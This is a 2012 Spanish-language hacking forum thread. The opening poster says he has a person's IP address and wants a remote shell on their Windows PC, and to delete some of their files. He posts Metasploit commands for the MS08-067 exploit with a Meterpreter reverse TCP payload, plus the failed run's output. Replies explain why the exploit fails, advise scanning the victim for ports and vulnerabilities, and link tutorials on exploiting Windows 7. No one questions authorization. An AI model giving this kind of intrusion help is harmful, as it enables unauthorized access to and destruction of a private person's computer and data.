Bienvenido(a), Visitante. Por favor, ingresa o regístrate.
Cargando

Autor Tema: (AYUDA) Hackear PC remotamente fuera de la red local con metasploits  (Leído 2033 veces)

Desconectado krisis609

• Ladrón de espacio en la BD [L0]
  • *
  • Topic Author
    • Ver Perfil
    • Hacker House
Hola! tengo la ip de una persona, el tema es el siguiente al poner estos codigos:

search windows/smb/ms [/size]use windows/smb/ms08_067_netapi [/color]
set
payload windows/meterpreter/reverse_tcp
[/size]show options[/color][/size]set rhost "IP de nuestra Victima" [/color]
[/size]set lhost "IP de nuestra Victima"  [/color]
[/size][/color]exploit

Tira esto:

• Started bind handler
  • Automatically detecting the target...
  • Fingerprint: Windows 7 Ultimate - (Build 7600) - lang:Unknown
  • We could not detect the language pack, defaulting to English
  • [-] Exploit exception: No matching target
  • Exploit completed, but no session was created.[/u][/b]

Al parecer es porque el tutorial es para que el target este ubicado en la red local! Alguien sabe como hacer lo mismo pero con una pc fuera de la red?? Osea en otro lado??

Solo quiero la sheel y si puedo borrar algunos archivos mejor PORFA!!! AYUDA!
    DESDE YA GRACIAS

KRISIS609

Desconectado metrikacod3

• Conociendo la comunidad [L2]
  • **
    • Ver Perfil
Re:(AYUDA) Hackear PC remotamente fuera de la red local con metasploits
« Respuesta #1 en: Julio 10, 2012, 05:22:50 pm »
Metasploit te lo dice claro,que te piensas que todos los pcs tienen esa vulnerabilidad o que?? para empezar según metasploit estas intentando entrar a un Windows 7 con un exploit que no funciona en windows 7 funciona de Xp para abajo eso para empezar,segundo as acaso escaneado a tu victima?? para saber que puertos y que vulnerabilidades tiene?? pues haz eso y luego intenta explotar algo anda y estudia un poco de metasploit y todos los temas de Bugs y Exploits que te hace falta.
Algunos de mis aportes:
sacar datos privados de un website (Video tutorial)
http://www.hackxcrack.es/forum/index.php?topic=9837.msg59197;topicseen#new
Explotando windows 7 con metasploit (Video tutorial)
http://www.hackxcrack.es/forum/index.php?topic=9794.0

Instalar gnome y kde en ubuntu
http://www.hackxcrack.es/forum/index.php?topic=12712.msg76093;topicseen#msg76093

Desconectado kyra

• **
    • Ver Perfil
    • Tech Info
« Respuesta #2 en: Julio 14, 2012, 11:51:10 pm »
Metasploit te lo dice claro,que te piensas que todos los pcs tienen esa vulnerabilidad o que?? para empezar según metasploit estas intentando entrar a un Windows 7 con un exploit que no funciona en windows 7 funciona de Xp para abajo eso para empezar,segundo as acaso escaneado a tu victima?? para saber que puertos y que vulnerabilidades tiene?? pues haz eso y luego intenta explotar algo anda y estudia un poco de metasploit y todos los temas de Bugs y Exploits que te hace falta.

Tienes razón pero no hay por que ser tan duro,krisis solo preguntaba
Está bien ser directo pero no duro,no es para tanto pienso yo :)

Las leyes no son perfectas porque los humanos que las crearon tampoco lo son.Sin embargo,las leyes son la prueba de que los humanos estan luchando para ser justos.
Si no puedes resolver el problema,si no puedes armar el rompecabezas,solo eres otro perdedor.
Hugs get more than handshakes:Ingeniería social

Desconectado kyra

• **
    • Ver Perfil
    • Tech Info
« Respuesta #3 en: Julio 14, 2012, 11:52:44 pm »
En respuesta a tu tema:
Cuando un ordenador desde fuera de una red hace una petición a la ip publica,esta pasa por el router,donde los puertos son redirigidos a cada ordenador.
Si esos puertos no están abiertos o redirigidos será dificil que lo consigas

Las leyes no son perfectas porque los humanos que las crearon tampoco lo son.Sin embargo,las leyes son la prueba de que los humanos estan luchando para ser justos.
Si no puedes resolver el problema,si no puedes armar el rompecabezas,solo eres otro perdedor.

Desconectado metrikacod3

• **
    • Ver Perfil
« Respuesta #4 en: Julio 15, 2012, 02:32:08 am »

Tu también tienes razón y si tal vez e sido un poco duro con este user pero esque ni siquiera se a presentado.
Algunos de mis aportes:
sacar datos privados de un website (Video tutorial)
http://www.hackxcrack.es/forum/index.php?topic=9837.msg59197;topicseen#new
Explotando windows 7 con metasploit (Video tutorial)
http://www.hackxcrack.es/forum/index.php?topic=9794.0

Instalar gnome y kde en ubuntu
http://www.hackxcrack.es/forum/index.php?topic=12712.msg76093;topicseen#msg76093

Desconectado ruben_linux

• Parte de la comunidad [L3]
    • Ver Perfil
    • AreaLinux
« Respuesta #5 en: Julio 15, 2012, 11:56:11 am »
difícil encontrar alguien con esa falla. Solo en entornos controlados, como un laboratorio.
Cada exploit es especifico para una falla, no puedes usar una llave que no abre esa puerta.
 ;)

Desconectado kyra

• **
    • Ver Perfil
    • Tech Info
« Respuesta #6 en: Julio 15, 2012, 05:00:00 pm »

Tu también tienes razón y si tal vez e sido un poco duro con este user pero esque ni siquiera se a presentado.
No hay problema y si,debería haberse presentado

krysis609,intenta presentarse antes en la zona de presaentaciones,es mas educado xD